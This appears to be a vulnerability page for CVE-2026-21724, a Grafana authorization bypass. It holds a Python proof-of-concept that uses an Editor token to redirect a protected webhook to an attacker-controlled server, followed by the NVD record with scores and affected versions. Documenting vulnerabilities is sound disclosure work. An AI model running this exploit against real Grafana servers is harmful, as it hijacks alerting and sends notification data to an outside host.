CVE-2026-21724

import requests # Target URL (Example) target_url = "http://target-grafana/api/provisioning/contact-points" # Payload to modify a protected webhook # The vulnerability allows 'Editor' role to perform this action payload = { "name": "Webhook-Modified", "type": "webhook", "settings": { "url": "http://attacker-controlled-server/webhook", "http_method": "POST" }, "isDefault": False, "provenance": "api" # Bypassing permission checks via provisioning API } headers = { "Content-Type": "application/json", "Authorization": "Bearer <Editor_Role_Token>" # Token with Editor role only } # Send the request to exploit the vulnerability try: response = requests.put(target_url, json=payload, headers=headers) if response.status_code == 202 or response.status_code == 200: print("[+] PoC Successful: Protected webhook URL modified without elevated permissions.") else: print(f"[-] PoC Failed: Status Code {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-21724", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:03.227", "lastModified": "2026-04-14T01:00:10.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been discovered in Grafana OSS where an authorization bypass in the provisioning contact points API allows users with Editor role to modify protected webhook URLs without the required alert.notifications.receivers.protected:write permission."}, {"lang": "es", "value": "Se ha descubierto una vulnerabilidad en Grafana OSS donde una omisión de autorización en la API de puntos de contacto de aprovisionamiento permite a los usuarios con rol de Editor modificar URLs de webhook protegidas sin el permiso requerido alert.notifications.receivers.protected:write."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:*", "versionStartIncluding": "11.6.9", "versionEndExcluding": "11.6.14", "matchCriteriaId": "B333C05C-D6CC-4292-B54B-5D081FE92C6E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:*", "versionStartIncluding": "12.1.5", "versionEndExcluding": "12.1.10", "matchCriteriaId": "252E74A8-BC0A-420D-A937-84AAE46C8BDA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:*", "versionStartIncluding": "12.2.2", "versionEndExcluding": "12.2.8", "matchCriteriaId": "409163A6-7B0A-4E46-AD47-620AFC841A9B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:*", "versionStartIncluding": "12.3.1", "versionEndExcluding": "12.3.6", "matchCriteriaId": "875BA099-9D0F-4DC0-80DF-5F35D06097AC"}]}]}], "references": [{"url": "https://grafana.com/security/security-advisories/cve-2026-21724", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}